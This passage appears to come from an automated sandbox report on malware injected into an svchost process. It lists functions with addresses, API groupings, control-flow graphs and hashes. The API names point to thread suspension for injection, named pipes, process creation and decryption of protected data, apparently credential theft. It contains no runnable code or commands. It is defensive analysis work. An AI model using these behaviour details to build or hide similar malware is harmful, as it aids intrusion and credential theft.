                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                                                  • String ID: \
                                                                                                                                                  • API String ID: 2722548352-2967466578
                                                                                                                                                  • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                  • Instruction ID: f181e36aaf885282d974434d668d08b34cd22daf58b229e882496241a4d4c86d
                                                                                                                                                  • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                  • Instruction Fuzzy Hash: ED41A2312089888FDB45EF28DCE89EA77B5FF94701F540666D44BDB1A5DF38A885CB80
                                                                                                                                                  Function 00007DF4F3B808CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3114477661-0
                                                                                                                                                  • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                  • Instruction ID: ae8fd69afd640090b94d4ef8bb62c70264279a3801e36416ba4ffd9e2ace51ba
                                                                                                                                                  • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                  • Instruction Fuzzy Hash: 6E714D3061CA888FE764DF28D8A97ABB7E5FF94355F40066ED48EC2191DB7894428B42
                                                                                                                                                  Function 00007DF4F3B859B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2502124517-0
                                                                                                                                                  • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                  • Instruction ID: 400840d80015787f919582111df5d624044c6824d979d275b54616b86bed418c
                                                                                                                                                  • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                  • Instruction Fuzzy Hash: 5D315D70608A488FE794DF28D8E87AA77E5FF94310F50466BE49AC2191DB38D9858B81
                                                                                                                                                  Function 00007DF4F3B6286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 489 7df4f3b6286c-7df4f3b628a6 call 7df4f3c5c99a 492 7df4f3b62978-7df4f3b6297b 489->492 493 7df4f3b628ac-7df4f3b628c0 call 7df4f3c5c994 Thread32First 489->493 495 7df4f3b62981-7df4f3b62989 492->495 496 7df4f3b62ace-7df4f3b62ae1 492->496 499 7df4f3b628c5-7df4f3b628ca 493->499 495->496 498 7df4f3b6298f-7df4f3b62990 495->498 500 7df4f3b62992-7df4f3b629ab 498->500 501 7df4f3b62956-7df4f3b62969 call 7df4f3c5c988 499->501 502 7df4f3b628d0-7df4f3b628da 499->502 505 7df4f3b629b1-7df4f3b629c8 SuspendThread 500->505 506 7df4f3b62abe-7df4f3b62ac8 500->506 501->499 510 7df4f3b6296f-7df4f3b62972 CloseHandle 501->510 502->501 509 7df4f3b628dc-7df4f3b628e6 502->509 511 7df4f3b629d6-7df4f3b629d8 505->511 506->496 506->500 509->501 517 7df4f3b628e8-7df4f3b628ee 509->517 510->492 512 7df4f3b62ab3-7df4f3b62abc 511->512 513 7df4f3b629de-7df4f3b629e2 511->513 512->506 515 7df4f3b629e4-7df4f3b629ee 513->515 516 7df4f3b629f0-7df4f3b629f1 513->516 518 7df4f3b629f4-7df4f3b629f6 515->518 516->518 520 7df4f3b62916-7df4f3b6291c 517->520 521 7df4f3b628f0-7df4f3b62912 517->521 518->512 524 7df4f3b629fc-7df4f3b62a12 518->524 522 7df4f3b62945-7df4f3b62952 520->522 523 7df4f3b6291e-7df4f3b62938 520->523 521->510 527 7df4f3b62914 521->527 522->501 523->510 531 7df4f3b6293a-7df4f3b62942 523->531 526 7df4f3b62a14-7df4f3b62a25 524->526 529 7df4f3b62a27-7df4f3b62a2a 526->529 530 7df4f3b62a3e 526->530 527->522 532 7df4f3b62a37-7df4f3b62a3c 529->532 533 7df4f3b62a2c-7df4f3b62a35 529->533 534 7df4f3b62a40-7df4f3b62a4a 530->534 531->522 532->534 533->534 535 7df4f3b62aa2-7df4f3b62aaa 534->535 536 7df4f3b62a4c-7df4f3b62a4e 534->536 535->526 539 7df4f3b62ab0-7df4f3b62ab1 535->539 537 7df4f3b62a54-7df4f3b62a61 536->537 538 7df4f3b62aed-7df4f3b62af1 536->538 540 7df4f3b62a63-7df4f3b62a6e 537->540 541 7df4f3b62a7d 537->541 542 7df4f3b62af3-7df4f3b62afd 538->542 543 7df4f3b62aff-7df4f3b62b0c 538->543 539->512 544 7df4f3b62a70-7df4f3b62a7b 540->544 545 7df4f3b62ae2-7df4f3b62aeb 540->545 546 7df4f3b62a7f-7df4f3b62a82 541->546 542->543 542->546 547 7df4f3b62b29-7df4f3b62b2d 543->547 548 7df4f3b62b0e-7df4f3b62b1a 543->548 544->540 544->541 545->546 546->535 551 7df4f3b62a84-7df4f3b62a9b 546->551 547->541 552 7df4f3b62b33-7df4f3b62b36 547->552 549 7df4f3b62b3b-7df4f3b62b43 548->549 550 7df4f3b62b1c-7df4f3b62b27 548->550 549->546 550->547 550->548 551->535 552->546
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandleSuspendThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1038686644-0
                                                                                                                                                  • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                  • Instruction ID: a29c99f3aade7d24b9520d43263792ac45b6aac9653ab98d3526d717243fb683
                                                                                                                                                  • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                  • Instruction Fuzzy Hash: 5691C431E0CA554BEB689B18D87527A73E1FF54310F5441EAD4CFCA587DA78E882CB81
                                                                                                                                                  Function 0000022C9E061CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2983894633.0000022C9E060000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022C9E060000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_22c9e060000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3811980168-0
                                                                                                                                                  • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                  • Instruction ID: 8c5283defa96e7fc3c0f93757aa1cf8011cc1c6e20d57f29c3d46fc9b4c4ce8f
                                                                                                                                                  • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                  • Instruction Fuzzy Hash: 6B91D370508E089FD764EB58C5457F973E1FB98710F24575EE88FC3296EA74A88287C1
                                                                                                                                                  Function 00007DF4F3B9D42C Relevance: 1.8, APIs: 1, Instructions: 552COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                  • Instruction ID: 54d7baf72d707c794270ecb4d8f5a8c2a7acecd805e36794a9111e65ff064fd4
                                                                                                                                                  • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                  • Instruction Fuzzy Hash: CF02013161CA484BE765EB19D465BABB7E1FF94300F80456EE48FC3193DE34E9858B82
                                                                                                                                                  Function 00007DF4F3B860F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                  • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                  • Instruction ID: 1436b5fb9b35f3916528598ba9883c8c571c471e16dc5aac6cd71573bf241b2d
                                                                                                                                                  • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                  • Instruction Fuzzy Hash: 6D31633071CA484FE744EB58D86976BB7E1FF99341F40456EE58EC3252DE38D8428752
                                                                                                                                                  Function 0000022C9E0615C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000022C9E061E3A), ref: 0000022C9E061654
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2983894633.0000022C9E060000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022C9E060000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_22c9e060000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                  • Instruction ID: 6655b33a260c95a50a2766a977afe31bb93eb793d46d090151c4165fda3b586f
                                                                                                                                                  • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                  • Instruction Fuzzy Hash: BC216F71508B098FDB58DF58C589A6AB7E1FB78705F140A2FF44AC7261D730D485CB81
                                                                                                                                                  Function 00007DF4F3B8E25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                  • Instruction ID: 968c7b2671f367d31340b1a4a995e200fcd27bb6686c81e05c6fe544a7105c52
                                                                                                                                                  • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                  • Instruction Fuzzy Hash: FFF0BD30E1CB848FDB64EF2CD489B5977E1FB98300F504559E88CC3345DA3498808B86
                                                                                                                                                  Function 00007DF4F3B8E094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                  • Instruction ID: c6a9e1a46ffd3576e1b0c1616833be3dbe6983bf20a46abcab9cec8308ef042c
                                                                                                                                                  • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                  • Instruction Fuzzy Hash: FEF0B234A1C7C48FD7A0EB288485B9ABBF0BB9A340F94495EE8CCC3311D735A4858B03
                                                                                                                                                  Function 00007DF4F3B8E3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                  • Instruction ID: 2ecfb3f23a61d427b824637d643479897e65427e57b9081262b68d430f737d2a
                                                                                                                                                  • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                  • Instruction Fuzzy Hash: 84E09B31618A448FDB05DF94C8D15AAB7F4EBD8300F444D7AF84FC7164D274D689C642
                                                                                                                                                  Function 00007DF4F3BED66C Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemInfo.KERNELBASE(?,00007DF4F3BFEF2F,?,?,?,?,00000000,00000000), ref: 00007DF4F3BED689
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                  • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                  • Instruction ID: 43df32d96260b39c6868edaa0ff1578bbd85bf28b241c46658c370436685343a
                                                                                                                                                  • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                  • Instruction Fuzzy Hash: 98E0483161480487F34AF731DCB54E77361FF96301BC045A3D40B811E6EE2D6285CB81
                                                                                                                                                  Function 00007DF4F3B8E170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                  • Instruction ID: ffcf84da2b502d50d52ad78c8539616ed3b8fce01ba0561de01dd9c64b1c694c
                                                                                                                                                  • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                  • Instruction Fuzzy Hash: 1BD05E30E2CA894BDA10B728885062677E1FB99304FD04654D48DC3200E23CE4C18782
                                                                                                                                                  Function 00007DF4F3B8E150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF4F3B8C0F7), ref: 00007DF4F3B8E160
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                  • Instruction ID: 7f504ef89ed9fa8d6a2a63824f59a9776e64d482795562cf0b03a4b7a23b6592
                                                                                                                                                  • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                  • Instruction Fuzzy Hash: B8C08C20F5890B8FEA4872AA8CA032621A0AF4C310FC00091944EC2290EB2CE4C24392
                                                                                                                                                  Function 00007DF4F3B8E3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1658770261-0
                                                                                                                                                  • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                  • Instruction ID: c4ebdd9f29f6eb3d9f87f81f4051a253fb28ec1074476fb4d9625f438189084b
                                                                                                                                                  • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                  • Instruction Fuzzy Hash: 8FC08C00F2880B6AEB46A2AA4CA062A20A0AF4C340FC01060E84EC2280E45CEAC18392
                                                                                                                                                  Function 00007DF4F3B64998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 197 7df4f3b64998-7df4f3b649d4 198 7df4f3b64d68-7df4f3b64d8e call 7df4f3bb3700 197->198 199 7df4f3b649da-7df4f3b649ea 197->199 200 7df4f3b649f6-7df4f3b649f9 199->200 201 7df4f3b649ec-7df4f3b649f4 199->201 203 7df4f3b649fb-7df4f3b64a03 200->203 204 7df4f3b64a05-7df4f3b64a08 200->204 201->200 203->204 206 7df4f3b64a0a-7df4f3b64a12 204->206 207 7df4f3b64a14-7df4f3b64a20 204->207 206->207 208 7df4f3b64a22-7df4f3b64a2b 207->208 209 7df4f3b64a2d-7df4f3b64a30 207->209 208->209 210 7df4f3b64a32-7df4f3b64a3b 209->210 211 7df4f3b64a3d-7df4f3b64a40 209->211 210->211 212 7df4f3b64a42-7df4f3b64a4b 211->212 213 7df4f3b64a4d-7df4f3b64a5e 211->213 212->213 213->198 214 7df4f3b64a64-7df4f3b64a69 213->214 214->198 215 7df4f3b64a6f-7df4f3b64a72 214->215 215->198 216 7df4f3b64a78-7df4f3b64a7d 215->216 216->198 217 7df4f3b64a83-7df4f3b64a87 216->217 217->198 218 7df4f3b64a8d-7df4f3b64aa2 217->218 218->198 220 7df4f3b64aa8-7df4f3b64b15 call 7df4f3bb5294 call 7df4f3bb55d4 call 7df4f3bb5640 call 7df4f3bb47a0 * 2 call 7df4f3bb41e8 218->220 220->198 233 7df4f3b64b1b-7df4f3b64bc5 call 7df4f3b616e0 call 7df4f3bb4044 call 7df4f3bb4114 call 7df4f3bb4148 * 2 call 7df4f3bb4168 call 7df4f3bb3954 malloc 220->233 233->198 248 7df4f3b64bcb-7df4f3b64c51 call 7df4f3b616e0 call 7df4f3bb3878 call 7df4f3bb5294 call 7df4f3bb55d4 call 7df4f3bb5640 call 7df4f3bb3726 233->248 261 7df4f3b64c57-7df4f3b64d0e call 7df4f3bb5294 call 7df4f3bb55d4 * 3 call 7df4f3bb5640 248->261 262 7df4f3b64d5f-7df4f3b64d62 free 248->262 261->262 273 7df4f3b64d10-7df4f3b64d47 call 7df4f3bb47a0 * 2 call 7df4f3bb41e8 261->273 262->198 273->262 280 7df4f3b64d49-7df4f3b64d59 call 7df4f3b6484c 273->280 280->262 283 7df4f3b64d5b-7df4f3b64d5c 280->283 283->262
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                  • String ID: x
                                                                                                                                                  • API String ID: 3061335427-2363233923
                                                                                                                                                  • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                  • Instruction ID: 6ad4d333901a254d4e9f58cc52c2a5f3f0ce5432e5a10bbad38166e6bc19aa1a
                                                                                                                                                  • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                  • Instruction Fuzzy Hash: F6B14A31A1CA844AE769A71894B56FBB7E1FF95301F9005EEE0CFC2183DD38E645C686
                                                                                                                                                  Function 00007DF4F3B8F00C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 284 7df4f3b8f00c-7df4f3b8f092 286 7df4f3b8f094-7df4f3b8f0a5 284->286 287 7df4f3b8f0a7 284->287 288 7df4f3b8f0ac-7df4f3b8f0ae 286->288 287->288 290 7df4f3b8f16f-7df4f3b8f17c 288->290 291 7df4f3b8f0b4-7df4f3b8f0c3 288->291 293 7df4f3b8f0c5-7df4f3b8f0cf 291->293 294 7df4f3b8f0d1-7df4f3b8f103 293->294 295 7df4f3b8f105 293->295 296 7df4f3b8f10a-7df4f3b8f10c 294->296 295->296 298 7df4f3b8f10e-7df4f3b8f115 296->298 299 7df4f3b8f166-7df4f3b8f167 296->299 298->299 300 7df4f3b8f117-7df4f3b8f131 calloc 298->300 299->290 300->293 301 7df4f3b8f133-7df4f3b8f149 call 7df4f3b616e0 300->301 304 7df4f3b8f155-7df4f3b8f160 301->304 305 7df4f3b8f14b-7df4f3b8f153 301->305 304->293 304->299 305->304
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: calloc
                                                                                                                                                  • String ID: 0$@
                                                                                                                                                  • API String ID: 2635317215-1545510068
                                                                                                                                                  • Opcode ID: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                  • Instruction ID: 21fd4331a1d145cd7251d4fa1e78fb5529004561c18f72937c8070abe4c5dea6
                                                                                                                                                  • Opcode Fuzzy Hash: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                  • Instruction Fuzzy Hash: D0416330608A498FE754EB58D46977B77E0FF98341F50056EE88EC3251EB79D885C742
                                                                                                                                                  Function 00007DF4F3B87598 Relevance: 3.9, APIs: 3, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 328 7df4f3b87598-7df4f3b875b2 329 7df4f3b875b8-7df4f3b875bf 328->329 330 7df4f3b87662-7df4f3b87684 malloc 328->330 329->330 332 7df4f3b875c5-7df4f3b875cf 329->332 331 7df4f3b87686-7df4f3b876ae 330->331 332->330 333 7df4f3b875d5-7df4f3b875ed 332->333 333->331 334 7df4f3b875f3-7df4f3b875fd 333->334 335 7df4f3b87615-7df4f3b87621 334->335 336 7df4f3b875ff-7df4f3b87613 334->336 335->335 337 7df4f3b87623-7df4f3b87660 malloc call 7df4f3b616e0 free 335->337 336->331 337->331
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc$free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1480856625-0
                                                                                                                                                  • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                  • Instruction ID: ebd990439039ac92713d145144d1c9230c11ee55ef6e71fe947d10e6b3f958c7
                                                                                                                                                  • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                  • Instruction Fuzzy Hash: 29415F31608D0E8FDB84EF2CD899AA577E0FF68315751466BD41EC3651DB34E8818BC0
                                                                                                                                                  Function 0000022C9E1733B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 350memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
